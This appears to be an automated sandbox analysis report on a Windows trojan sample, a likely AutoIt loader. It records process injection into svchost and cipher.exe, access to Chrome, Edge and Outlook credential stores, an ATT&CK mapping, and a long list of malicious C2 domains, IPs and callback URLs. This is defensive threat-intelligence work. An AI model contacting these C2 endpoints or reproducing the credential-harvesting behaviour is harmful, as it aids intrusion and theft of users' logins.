            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cipher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cipher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cipher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\cipher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\cipher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cipher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cipher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\cipher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cipher.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: PI No 20000814C.exe | Binary or memory string: WIN_81
Source: PI No 20000814C.exe | Binary or memory string: WIN_XP
Source: PI No 20000814C.exe | Binary or memory string: WIN_XPe
Source: PI No 20000814C.exe | Binary or memory string: WIN_VISTA
Source: PI No 20000814C.exe | Binary or memory string: WIN_7
Source: PI No 20000814C.exe | Binary or memory string: WIN_8
Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F76596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00F76596
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F76A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00F76A5A
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count shown beside a matched technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (31); Software Packing (1); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (16); Security Software Discovery (51); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1446508 | Sample: PI No 20000814C.exe | Start date: 23/05/2024 | Architecture: WINDOWS | Score: 100

Sample-level network: www.autonomyai.xyz, www.upshercode.store, 21 other IPs or domains
Sample-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures; Performs DNS queries to domains with low reputation (www.autonomyai.xyz)

Process chain (from the behavior graph):
PI No 20000814C.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  svchost.exe (started by PI No 20000814C.exe): Maps a DLL or memory area into another process
    YoOsbbockoYKKBpRowW.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
      cipher.exe (started by YoOsbbockoYKKBpRowW.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
        YoOsbbockoYKKBpRowW.exe (injected by cipher.exe): Found direct / indirect Syscall (likely to bypass EDR); network: www.anoldshow.top 203.161.43.228 (ports 49723, 49724, 49725; VNPT-AS-VN VNPTCorpVN, Malaysia), upshercode.store 162.240.81.18 (ports 49706, 49707, 49708; UNIFIEDLAYER-AS-1 US, United States), 11 other IPs or domains
        firefox.exe (started by cipher.exe)

Source | Detection | Scanner | Label
PI No 20000814C.exe | 41% | Virustotal |
PI No 20000814C.exe | 39% | ReversingLabs | Win32.Trojan.ShellcodeCrypter
PI No 20000814C.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner
www.botcsllc.com | 0% | Virustotal
www.brzuszkiewicz.pl | 0% | Virustotal
upshercode.store | 0% | Virustotal
www.fruitique.co.uk | 1% | Virustotal
autonomyai.xyz | 1% | Virustotal
szandraromanovics.hu | 0% | Virustotal
isrninjas.com | 0% | Virustotal
www.autonomyai.xyz | 2% | Virustotal
emgeecontracting.shop | 1% | Virustotal
www.emgeecontracting.shop | 0% | Virustotal
www.badcopsinyourtown.info | 1% | Virustotal
www.darkerberrycoffee.com | 0% | Virustotal
Source | Detection | Scanner | Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
http://www.kubanci.ru/3nn5/ | 0% | Avira URL Cloud | safe
https://twitter.com/hover | 0% | Avira URL Cloud | safe
http://www.darkerberrycoffee.com/q801/ | 0% | Avira URL Cloud | safe
https://www.instagram.com/hover_domains | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy | 0% | Avira URL Cloud | safe
http://www.darkerberrycoffee.com/q801/ | 0% | Virustotal |
http://www.novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
https://www.instagram.com/hover_domains | 0% | Virustotal |
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
http://www.isrninjas.com/klk7/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
http://www.badcopsinyourtown.info/vucc/ | 0% | Avira URL Cloud | safe
http://www.ilodezu.com/z48v/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.szandraromanovics.hu/xaki/ | 0% | Avira URL Cloud | safe
http://www.szandraromanovics.hu/xaki/?FNPd=wRLBEujJd4B1pnn0jgbcCD9yzLi5n0gWQHliinLShRQwSVs5kwR/9Eag334lnRUYK0hhQTyk4agd1D3QGuL+jgjAjqkpdV5oyMSY0wmC42s9caEZ6Np2ARJau1ITEDyDk07yXfw=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
http://www.featurasandals.com/tqo3/ | 0% | Avira URL Cloud | safe
http://www.kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
http://www.isrninjas.com | 0% | Avira URL Cloud | safe
http://www.fruitique.co.uk/2oa4/ | 0% | Avira URL Cloud | safe
http://www.badcopsinyourtown.info/vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
http://www.darkerberrycoffee.com/q801/?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
http://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs= | 0% | Avira URL Cloud | safe
https://t2837.am-track.pl/redir.php?panel=Market_Listing&params=id%3D3940392%26utm_source%3Dmarket_r | 0% | Avira URL Cloud | safe
http://nginx.net/ | 0% | Avira URL Cloud | safe
http://www.autonomyai.xyz/nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
https://www.hover.com/domains/results | 0% | Avira URL Cloud | safe
http://fedoraproject.org/ | 0% | Avira URL Cloud | safe
http://www.anoldshow.top/ii3e/ | 0% | Avira URL Cloud | safe
http://www.ilodezu.com/z48v/?FNPd=V7EBmqWgiCvSgvqad7SyaCOgC+e4BvQG3ktlhx6lo/cZrGqdjKlpWUio9FOhJOaxZOVNIG538/ROKaWARcsTTcMUAhKYPtR70XL2Xhx4NmC7fpbV6q2t8I9SMzcLGlFD+PeBXEg=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
http://www.brzuszkiewicz.pl/xf32/ | 0% | Avira URL Cloud | safe
http://www.novosti-dubai.ru/pczf/ | 0% | Avira URL Cloud | safe
http://www.botcsllc.com/qukz/ | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe
http://www.botcsllc.com/qukz/?FNPd=2j86s8NJ5fDu8DdyaluKTyyQGpxO5RQn4ZQP4QlLq4dDbMhIcvPH81QwZFWQYfauPSKzeNxy1T+ygqRogiCCubiSHCzeY+ai+VGnS0fEikTej8/T0yfRDQzRtbWcxq7BJieL0EY=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
http://www.emgeecontracting.shop/88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
http://www.autonomyai.xyz/nvvv/ | 0% | Avira URL Cloud | safe
http://kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N | 0% | Avira URL Cloud | safe
http://www.upshercode.store/x98j/ | 0% | Avira URL Cloud | safe
http://www.dvizhenie-pallet.ru/t96c/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=4HeJ9NLv0sXxrw0DzDAC1WoSlNK9MN8e7k2kqtvkuL0qZpE735Fp+TMdSC/xJF1XoX+msXZD9KWOaF8gkpoi/zU8Ecilk3SCpDE4oxEYJqxSeKyI7QDD26ritGREhwxOgv5PBbM= | 0% | Avira URL Cloud | safe
http://www.anoldshow.top/ii3e/?FNPd=gUffmmgf+j+eonfXGycQzt8ao2VHtB63wMQRmDLG69g3nf5Br3Vvevf8g6YjJ3DFTJ0p8mRaN1UTMPOwjNToF+SwMNbt6WzMyov1r5SS6GyZoHVOyxmtZVBap1MoFQhjNwOQqL8=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
http://www.dvizhenie-pallet.ru/t96c/ | 0% | Avira URL Cloud | safe
http://www.isrninjas.com/klk7/?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm | 0% | Avira URL Cloud | safe
http://novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMY | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.botcsllc.com | 216.40.34.41 | true | true |  | unknown
darkerberrycoffee.com | 3.33.130.190 | true | true |  | unknown
www.brzuszkiewicz.pl | 185.253.212.22 | true | true |  | unknown
www.ilodezu.com | 188.114.96.3 | true | true |  | unknown
upshercode.store | 162.240.81.18 | true | true |  | unknown
www.fruitique.co.uk | 212.227.172.253 | true | true |  | unknown
autonomyai.xyz | 3.33.130.190 | true | true |  | unknown
www.featurasandals.com | 104.21.28.203 | true | true |  | unknown
www.novosti-dubai.ru | 87.236.16.214 | true | true |  | unknown
isrninjas.com | 3.33.130.190 | true | true |  | unknown
www.dvizhenie-pallet.ru | 5.101.153.149 | true | true |  | unknown
szandraromanovics.hu | 92.118.24.161 | true | true |  | unknown
www.anoldshow.top | 203.161.43.228 | true | true |  | unknown
badcopsinyourtown.info | 3.33.130.190 | true | true |  | unknown
www.kubanci.ru | 194.58.112.174 | true | true |  | unknown
emgeecontracting.shop | 69.57.162.24 | true | true |  | unknown
www.autonomyai.xyz | unknown | unknown | true |  | unknown
www.darkerberrycoffee.com | unknown | unknown | true |  | unknown
www.upshercode.store | unknown | unknown | true |  | unknown
www.isrninjas.com | unknown | unknown | true |  | unknown
www.emgeecontracting.shop | unknown | unknown | true |  | unknown
www.szandraromanovics.hu | unknown | unknown | true |  | unknown
www.badcopsinyourtown.info | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.kubanci.ru/3nn5/ | true | Avira URL Cloud: safe | unknown
http://www.darkerberrycoffee.com/q801/ | true | 0% Virustotal; Avira URL Cloud: safe | unknown
http://www.novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.isrninjas.com/klk7/ | true | Avira URL Cloud: safe | unknown
http://www.badcopsinyourtown.info/vucc/ | true | Avira URL Cloud: safe | unknown
http://www.ilodezu.com/z48v/ | true | Avira URL Cloud: safe | unknown
http://www.szandraromanovics.hu/xaki/ | true | Avira URL Cloud: safe | unknown
http://www.szandraromanovics.hu/xaki/?FNPd=wRLBEujJd4B1pnn0jgbcCD9yzLi5n0gWQHliinLShRQwSVs5kwR/9Eag334lnRUYK0hhQTyk4agd1D3QGuL+jgjAjqkpdV5oyMSY0wmC42s9caEZ6Np2ARJau1ITEDyDk07yXfw=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.fruitique.co.uk/2oa4/ | true | Avira URL Cloud: safe | unknown
http://www.featurasandals.com/tqo3/ | true | Avira URL Cloud: safe | unknown
http://www.badcopsinyourtown.info/vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.darkerberrycoffee.com/q801/?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs= | true | Avira URL Cloud: safe | unknown
http://www.autonomyai.xyz/nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.anoldshow.top/ii3e/ | true | Avira URL Cloud: safe | unknown
http://www.ilodezu.com/z48v/?FNPd=V7EBmqWgiCvSgvqad7SyaCOgC+e4BvQG3ktlhx6lo/cZrGqdjKlpWUio9FOhJOaxZOVNIG538/ROKaWARcsTTcMUAhKYPtR70XL2Xhx4NmC7fpbV6q2t8I9SMzcLGlFD+PeBXEg=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.brzuszkiewicz.pl/xf32/ | true | Avira URL Cloud: safe | unknown
http://www.novosti-dubai.ru/pczf/ | true | Avira URL Cloud: safe | unknown
http://www.botcsllc.com/qukz/ | true | Avira URL Cloud: safe | unknown
http://www.botcsllc.com/qukz/?FNPd=2j86s8NJ5fDu8DdyaluKTyyQGpxO5RQn4ZQP4QlLq4dDbMhIcvPH81QwZFWQYfauPSKzeNxy1T+ygqRogiCCubiSHCzeY+ai+VGnS0fEikTej8/T0yfRDQzRtbWcxq7BJieL0EY=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.emgeecontracting.shop/88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.autonomyai.xyz/nvvv/ | true | Avira URL Cloud: safe | unknown
http://www.upshercode.store/x98j/ | true | Avira URL Cloud: safe | unknown
http://www.dvizhenie-pallet.ru/t96c/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=4HeJ9NLv0sXxrw0DzDAC1WoSlNK9MN8e7k2kqtvkuL0qZpE735Fp+TMdSC/xJF1XoX+msXZD9KWOaF8gkpoi/zU8Ecilk3SCpDE4oxEYJqxSeKyI7QDD26ritGREhwxOgv5PBbM= | true | Avira URL Cloud: safe | unknown
http://www.anoldshow.top/ii3e/?FNPd=gUffmmgf+j+eonfXGycQzt8ao2VHtB63wMQRmDLG69g3nf5Br3Vvevf8g6YjJ3DFTJ0p8mRaN1UTMPOwjNToF+SwMNbt6WzMyov1r5SS6GyZoHVOyxmtZVBap1MoFQhjNwOQqL8=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
http://www.dvizhenie-pallet.ru/t96c/ | true | Avira URL Cloud: safe | unknown
http://www.isrninjas.com/klk7/?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://twitter.com/hover | cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://www.instagram.com/hover_domains | cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy | cipher.exe, 00000004.00000002.4527269915.0000000007340000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.00000000047E0000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.isrninjas.com | YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4527764176.00000000052C7000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t2837.am-track.pl/redir.php?panel=Market_Listing&params=id%3D3940392%26utm_source%3Dmarket_r | cipher.exe, 00000004.00000002.4527269915.00000000069D4000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003E74000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nginx.net/ | cipher.exe, 00000004.00000002.4527269915.0000000005ED6000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003376000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
